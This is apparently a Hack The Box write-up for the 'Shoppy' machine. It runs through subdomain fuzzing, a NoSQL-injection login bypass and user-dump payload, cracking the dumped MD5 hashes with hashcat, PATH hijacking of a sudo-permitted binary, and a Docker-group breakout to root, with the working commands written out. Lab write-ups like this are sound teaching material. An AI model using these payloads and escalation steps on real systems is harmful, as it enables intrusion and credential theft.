Home Shoppy
Post
Cancel

Shoppy

Posted Dec 31, 2022 Updated Jan 10, 2023
By 0xskar
2 min read

Initial nmap scans gve us a few ports and an http server on 80 that needs to be setup in hosts to access. http://shoppy.htb

Running feroxbuster we find a /login on port 80

Check for subdomains wfuzz -c -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -u 'http://shoppy.htb' -H "Host: FUZZ.shoppy.htb" --hc 301

we find mattermost add it to the /etc/hosts

We can bypass the login screen using nosql injection

  • user=' || 1==1%00&pass=' || 1==1%00

Then searching for users we can use the following to dump all users

  • http://shoppy.htb/admin/search-users?username=admin'||'1==1
1
2
3
4
5
6
7
8

0	
_id	"62db0e93d6d6a999a66ee67a"
username	"admin"
password	"23c6877d9e2b564ef8b32c3a23de27b2"
1	
_id	"62db0e93d6d6a999a66ee67b"
username	"josh"
password	"6ebcea65320589ca4f2f1ce039975995"
  • hashcat -m 0 shoppy.htb.hashes.josh /usr/share/wordlists/rockyou.txt

and we get joshs pass: 6ebcea65320589ca4f2f1ce039975995:remembermethisway

We can login the the mattermost subdomain with their credentials.

Checking the recent mentions we have a note from jaeger

1
2
3
4

or the deploy machine, you can create an account with these creds :
username: jaeger
password: Sh0ppyBest@pp!
And deploy on it.

also

1
2
3
4

josh
1:25 AM

Oh I forgot to tell you, that we're going to use docker for the deployment, so I will add it to the first deploy

We can login via ssh with jaeger creds. and get user.txt flag

Checking sudo -l we can run the following command sudo -u deploy /home/deploy/password-manager which

basically looks for creds then when proper creds inserted executes cat /home/deploy/creds.txt. now this isnt using the full path so we should be ablt to use PATH escalation. Create a cat file in /tmp with bash -i then add /tmp to PATH. export PATH=/tmp:$PATH then using ghidra we find the password for the manager is Sample. Running the file we get deploy creds.

1
2
3
4
5
6

Welcome to Josh password manager!
Please enter your master password: Sample
Access granted! Here is creds !
Deploy Creds :
username: deploy
password: Deploying@pp!

su to deply

checkng id and as expected we are inside a docker container and since we now have a user that belongs to the docker group we can escape. https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation

  • find / -name docker.sock 2>/dev/null
  • docker run -it -v /:/host/ alpine chroot /host/ bash

and we’re root

Walkthrough, Hackthebox, CTF
nosql mongodb hashcat john ghidra PATH docket DNS
This post is licensed under CC BY 4.0 by the author.
Recently Updated